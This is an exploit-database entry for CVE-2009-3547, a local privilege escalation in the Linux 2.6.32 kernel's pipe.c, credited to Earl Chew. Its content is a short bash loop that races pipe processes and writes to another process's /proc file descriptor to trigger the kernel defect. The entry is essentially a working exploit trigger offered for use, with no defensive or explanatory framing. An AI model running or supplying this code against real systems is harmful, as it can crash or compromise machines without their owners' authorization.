Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)



EKU-ID: 17686 CVE: CVE-2009-3547;OSVDB-59654 OSVDB-ID:
Author: Earl Chew Published: 2009-11-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done